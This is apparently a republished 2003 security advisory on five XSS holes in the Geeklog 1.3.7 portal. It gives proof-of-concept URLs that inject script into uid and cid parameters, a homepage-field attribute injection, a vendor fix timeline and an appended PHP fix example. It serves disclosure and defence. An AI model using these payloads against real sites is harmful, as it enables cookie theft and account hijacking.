Multiple XSS in Geeklog 1.3.7

2007.10.15
Credit: snooq
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

nothing new. typical XSS bugs.

summary
=======

Geeklog is a web portal system written in PHP. There exist 5 XSS holes
in the software.

the 'holes'
===========

--1--
http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie)</script>

--2--
http://vulnerable.host/users.php?mode=profile&uid=<script>alert(document.cookie)</script>

--3--
http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>

--4--
http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>

--5--
'homepage' field in the user's account information page is not sanitised
properly. As a result, javascript can be injected by setting the 'homepage'
field like this:

http://url" onmouseover="alert(document.cookie)

** 3) & 4) were found by Dirk Haun of Geeklog Team.

vendor status
=============

03/01/2003 contacted Dirk Haun of Geeklog team
14/01/2003 Geeklog 1.3.7sr1 was released. New version closes all holes found.

--==snooq==--
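An added example, not Geeklog source and not the 1.3.7sr1 patch: one way to close both classes of hole listed above, assuming uid and cid are numeric identifiers and the homepage value is rendered inside an href attribute. The function names safe_id and homepage_link are hypothetical.

```php
<?php
// Added illustration; not Geeklog code. Function names are hypothetical.

// Holes 1-4: uid and cid are assumed to be numeric identifiers, so accept
// digits only instead of echoing the raw request value back into the page.
function safe_id($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 10) {
        return null; // markup, arrays, negatives and empty values are refused
    }
    return (int) $raw;
}

// Hole 5: the homepage value is assumed to land inside href="...".
// Allow only http(s) URLs as a first filter, then encode quotes and angle
// brackets on output so the value can never close the attribute.
function homepage_link($raw): string
{
    if (!is_string($raw)) {
        return '';
    }
    $url    = trim($raw);
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (filter_var($url, FILTER_VALIDATE_URL) === false
        || !in_array($scheme, ['http', 'https'], true)) {
        return '';
    }
    // Output encoding is the actual guarantee; validation is defence in depth.
    $safe = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $safe . '" rel="nofollow">' . $safe . '</a>';
}

// Inputs below are the advisory's own test strings plus constructed benign ones.
$samples = ['2', '<script>alert(document.cookie)</script>'];
foreach ($samples as $uid) {
    $id = safe_id($uid);
    echo $id === null ? "uid rejected\n" : "uid accepted: $id\n";
}

$homepages = ['http://example.org/', 'http://url" onmouseover="alert(document.cookie)'];
foreach ($homepages as $hp) {
    $link = homepage_link($hp);
    echo $link === '' ? "homepage rejected\n" : $link . "\n";
}
```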


Copyright 2022, cxsecurity.com

 
